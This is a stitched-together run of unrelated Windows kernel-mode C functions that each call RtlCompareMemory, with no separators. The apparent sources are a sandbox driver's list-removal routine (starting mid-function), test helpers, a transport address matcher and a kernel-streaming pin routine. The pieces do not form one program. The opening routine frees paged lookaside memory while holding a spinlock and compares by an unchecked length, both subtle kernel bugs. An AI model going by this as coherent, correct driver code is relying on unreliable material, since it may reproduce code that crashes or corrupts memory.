if (IsListEmpty(&MatchExpressionList.HeadList))
{
KdPrint(("[ISISandBox] RemoveMatchExpression -> List is empty.\n"));
return STATUS_SUCCESS;
}
KdPrint(("[ISISandBox] RemoveMatchExpression -> Get spinlock.\n"));
KIRQL irql;
KeAcquireSpinLock(&MatchExpressionList.Lock, &irql);
// 链表头
PLIST_ENTRY pList = MatchExpressionList.HeadList.Flink;
BOOLEAN isFind = FALSE;
while (pList != &MatchExpressionList.HeadList)
{
PMATCH_EXPRESSION element = CONTAINING_RECORD(pList, MATCH_EXPRESSION, ListEntry);
if (RtlCompareMemory(element->Expression, Expression, ExpressionLength) == ExpressionLength)
{
pList->Blink->Flink = pList->Flink;
pList->Flink->Blink = pList->Blink;
pList = pList->Flink;
// 这里的指针都已经断开了,即链表中不存在element了,现在只需要将其内存释放就OK了
ExFreeToPagedLookasideList(&MatchExpressionList.PageList, element);
KdPrint(("[ISISandBox] RemoveMatchExpression Delete expression | Expression : %S.\n", Expression));
isFind = TRUE;
break;
}
pList = pList->Flink;
}
KeReleaseSpinLock(&MatchExpressionList.Lock, irql);
if (isFind)
return STATUS_SUCCESS;
else
{
KdPrint(("[ISISandBox] RemoveMatchExpression Cannot find expression : %S.\n", Expression));
return STATUS_NOT_FOUND;
}
}
static
BOOLEAN
CheckStringBuffer(
PCWSTR Buffer,
SIZE_T Length,
SIZE_T MaximumLength,
PCWSTR Expected)
{
SIZE_T ExpectedLength = wcslen(Expected) * sizeof(WCHAR);
SIZE_T EqualLength;
BOOLEAN Result = TRUE;
SIZE_T i;
if (Length != ExpectedLength)
{
ok(0, "String length is %lu, expected %lu\n", (ULONG)Length, (ULONG)ExpectedLength);
Result = FALSE;
}
EqualLength = RtlCompareMemory(Buffer, Expected, Length);
if (EqualLength != Length)
{
ok(0, "String is '%S', expected '%S'\n", Buffer, Expected);
Result = FALSE;
}
if (Buffer[Length / sizeof(WCHAR)] != UNICODE_NULL)
{
ok(0, "Not null terminated\n");
Result = FALSE;
}
/* the function nulls the rest of the buffer! */
for (i = Length + sizeof(UNICODE_NULL); i < MaximumLength; i++)
{
UCHAR Char = ((PUCHAR)Buffer)[i];
if (Char != 0)
{
ok(0, "Found 0x%x at offset %lu, expected 0x%x\n", Char, (ULONG)i, 0);
/* don't count this as a failure unless the string was actually wrong */
//Result = FALSE;
/* don't flood the log */
break;
}
}
return Result;
}
NTSTATUS
LstransIsInAddressList(
IN PTA_LSTRANS_ADDRESS AddrList,
IN PTA_LSTRANS_ADDRESS Address,
IN BOOLEAN InvalidateIfMatch
){
NTSTATUS status;
ULONG idx_addr;
//
// Parameter check
//
if(!Address || Address->TAAddressCount != 1) {
return STATUS_INVALID_PARAMETER;
}
if(!AddrList || AddrList->TAAddressCount < 1) {
return STATUS_INVALID_PARAMETER;
}
//
// Match address
//
status = STATUS_OBJECT_NAME_NOT_FOUND;
for(idx_addr = 0; idx_addr < (ULONG)AddrList->TAAddressCount; idx_addr++) {
if( Address->Address[0].AddressType == AddrList->Address[idx_addr].AddressType &&
Address->Address[0].AddressLength == AddrList->Address[idx_addr].AddressLength &&
RtlCompareMemory( &Address->Address[0].Address,
&AddrList->Address[idx_addr].Address,
Address->Address[0].AddressLength) == Address->Address[0].AddressLength) {
if(InvalidateIfMatch) {
AddrList->Address[idx_addr].AddressLength = 0;
}
status = STATUS_SUCCESS;
break;
}
}
return status;
}
NTSTATUS
NTAPI
PinCreate(
IN PKSPIN Pin,
IN PIRP Irp)
{
PKSFILTER Filter;
PKSPIN FirstPin;
PPIN_CONTEXT PinContext;
/* first get the parent filter */
Filter = KsPinGetParentFilter(Pin);
/* now get first child pin */
FirstPin = KsFilterGetFirstChildPin(Filter, Pin->Id);
/* sanity check */
ASSERT(FirstPin);
if (FirstPin != Pin)
{
/* a previous pin already exists */
if (RtlCompareMemory(FirstPin->ConnectionFormat, Pin->ConnectionFormat, Pin->ConnectionFormat->FormatSize) != Pin->ConnectionFormat->FormatSize)
{
/* each instantiated pin must have the same connection format */
return STATUS_INVALID_PARAMETER;
}
}
/* allocate pin context */
PinContext = ExAllocatePool(NonPagedPool, sizeof(PIN_CONTEXT));
if (!PinContext)
return STATUS_INSUFFICIENT_RESOURCES;
/* store pin context */
Pin->Context = PinContext;
/* clear pin context */
RtlZeroMemory(PinContext, sizeof(PIN_CONTEXT));
/* FIXME
* check allocator framing and apply to all pins
*/
return STATUS_SUCCESS;
}
void TestFsRtlInitializeTunnelCache()
{
SIZE_T eq;
T = ExAllocatePool(PagedPool, sizeof(TUNNEL));
ok(T != NULL, "PTUNEL is NULL after allocated memory\n");
Tb = ExAllocatePool(PagedPool, sizeof(TUNNEL));
ok(Tb != NULL, "PTUNEL is NULL after allocated memory\n");
memset((void*)T, 0, sizeof(TUNNEL));
memset((void*)Tb, 0, sizeof(TUNNEL));
FsRtlInitializeTunnelCache(T);
eq = RtlCompareMemory((const VOID*)T, (const VOID*)Tb, sizeof(TUNNEL));
ok ( eq != sizeof(TUNNEL), "FsRtlInitializeTunnelCache function did not change anything in the memory at the address PTUNEL.\n");
}
